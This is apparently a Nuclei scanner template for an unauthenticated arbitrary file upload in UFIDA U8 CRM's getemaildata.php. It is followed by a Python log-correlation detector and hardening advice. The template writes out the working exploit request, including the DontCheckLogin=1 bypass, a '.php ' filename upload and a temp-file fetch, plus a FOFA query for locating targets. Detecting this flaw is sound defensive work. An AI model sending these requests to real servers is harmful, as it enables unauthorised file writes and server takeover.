id: yonyou-u8-crm-fileupload

info:
  name: UFIDA U8-CRM getemaildata - Arbitrary File Upload
  author: SleepingBag945,pussycat0x
  severity: critical
  description: |
    There is an arbitrary file upload vulnerability in the getemaildata.php file of the UFIDA U8 CRM customer relationship management system. An attacker can obtain server permissions through the vulnerability and attack the server.
  metadata:
    verified: true
    max-request: 2
    fofa-query: body="用友U8CRM"
  tags: yonyou,file-upload,u8-crm,intrusive

http:
  - raw:
      - |
        POST /ajax/getemaildata.php?DontCheckLogin=1 HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 300
        Cache-Control: max-age=0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
        Origin: null
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAVuAKsvesmnWtgEP
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.8
        Cookie: PHPSESSID=ibru7pqnplhi720caq0ev8uvt0

        ------WebKitFormBoundaryAVuAKsvesmnWtgEP
        Content-Disposition: form-data; name="file"; filename="%s.php "
        Content-Type: application/octet-stream

        {{randstr}}
        ------WebKitFormBoundaryAVuAKsvesmnWtgEP
        Content-Disposition: form-data; name="upload"

        upload
        ------WebKitFormBoundaryAVuAKsvesmnWtgEP--

      - |
        GET /tmpfile/{{path}}.tmp.mht HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code_1==200 && status_code_2==200"
          - "contains(body_2, '{{randstr}}')"
        condition: and

    extractors:
      - type: regex
        part: body_1
        internal: true
        name: path
        group: 1
        regex:
          - '([a-zA-Z0-9]+)\.tmp\.mht'
# digest: 4b0a00483046022100e656811347cdd4dda04256a5cda88439ae6fd34b6d69e0c3b063978435ae9a6b02210092c415a317f35ec9f01af48589cb0b2acad5549bc2ab18a1b3399d9fc0a8d0b2:922c64590222798bb761d5b6d8e72950
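The template above describes a two-step pattern that is easy to spot in web-server access logs: an unauthenticated POST to `/ajax/getemaildata.php` carrying `DontCheckLogin=1`, followed shortly afterwards by a GET for `/tmpfile/<alnum>.tmp.mht` from the same client. The following detection script is an added example for defenders and is not part of the Nuclei template or the vendor's code. It assumes combined-format access logs (Apache/Nginx style); the log lines, client addresses (RFC 5737 documentation ranges) and the five-minute correlation window are constructed for illustration.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import parse_qs

# Combined/common access-log line: client, timestamp, request line, status.
# Assumption: the log follows the Apache/Nginx default format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Paths taken from the template: the upload handler and the temp-file location.
UPLOAD_PATH = "/ajax/getemaildata.php"
TMPFILE_RE = re.compile(r"^/tmpfile/[a-zA-Z0-9]+\.tmp\.mht$")


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%d/%b/%Y:%H:%M:%S %z")
    ev["status"] = int(ev["status"])
    ev["path"], _, ev["query"] = ev["target"].partition("?")
    return ev


def is_unauth_upload(ev):
    """POST to the upload handler with the login bypass parameter set to 1."""
    if ev["method"] != "POST" or ev["path"] != UPLOAD_PATH:
        return False
    return parse_qs(ev["query"]).get("DontCheckLogin") == ["1"]


def detect(lines, window=timedelta(minutes=5)):
    """Return findings for upload attempts and for upload->fetch sequences.

    A lone bypass POST is reported as 'medium' (attempt); a successful GET of a
    tmpfile from the same client within `window` after such a POST is reported
    as 'critical', because the template's own success condition is exactly that
    sequence (status 200 on both requests).
    """
    findings = []
    uploads_by_ip = {}  # client -> timestamps of bypass POSTs seen so far
    for ev in filter(None, (parse_line(l) for l in lines)):
        if is_unauth_upload(ev):
            uploads_by_ip.setdefault(ev["ip"], []).append(ev["ts"])
            findings.append({
                "severity": "medium",
                "ip": ev["ip"],
                "ts": ev["ts"],
                "reason": "unauthenticated upload attempt (DontCheckLogin=1)",
                "status": ev["status"],
            })
        elif ev["method"] == "GET" and ev["status"] == 200 and TMPFILE_RE.match(ev["path"]):
            recent = [t for t in uploads_by_ip.get(ev["ip"], [])
                      if timedelta(0) <= ev["ts"] - t <= window]
            if recent:
                findings.append({
                    "severity": "critical",
                    "ip": ev["ip"],
                    "ts": ev["ts"],
                    "reason": "tmpfile fetched after bypass upload: " + ev["path"],
                    "status": ev["status"],
                })
    return findings


# Constructed sample log: one full upload->fetch sequence, one unrelated 404,
# one POST without the bypass parameter, and ordinary traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Mar/2024:10:15:01 +0000] "POST /ajax/getemaildata.php?DontCheckLogin=1 HTTP/1.1" 200 512',
    '203.0.113.5 - - [12/Mar/2024:10:15:02 +0000] "GET /index.php HTTP/1.1" 200 1024',
    '203.0.113.5 - - [12/Mar/2024:10:15:03 +0000] "GET /tmpfile/aB3k9Q.tmp.mht HTTP/1.1" 200 64',
    '198.51.100.7 - - [12/Mar/2024:10:20:10 +0000] "GET /tmpfile/xyz123.tmp.mht HTTP/1.1" 404 0',
    '198.51.100.9 - - [12/Mar/2024:10:21:00 +0000] "POST /ajax/getemaildata.php HTTP/1.1" 302 0',
    'not a log line',
]

if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f["severity"], f["ip"], f["ts"].isoformat(), f["reason"])
```

The two-stage correlation matters: a single POST with `DontCheckLogin=1` may be a scanner probe against a patched host, whereas a 200 on a freshly named `.tmp.mht` from the same client is the template's own proof of a successful write and should page someone. Blocking or authenticating `/ajax/getemaildata.php` regardless of the `DontCheckLogin` parameter, and serving `/tmpfile/` without execution, removes both halves of the pattern.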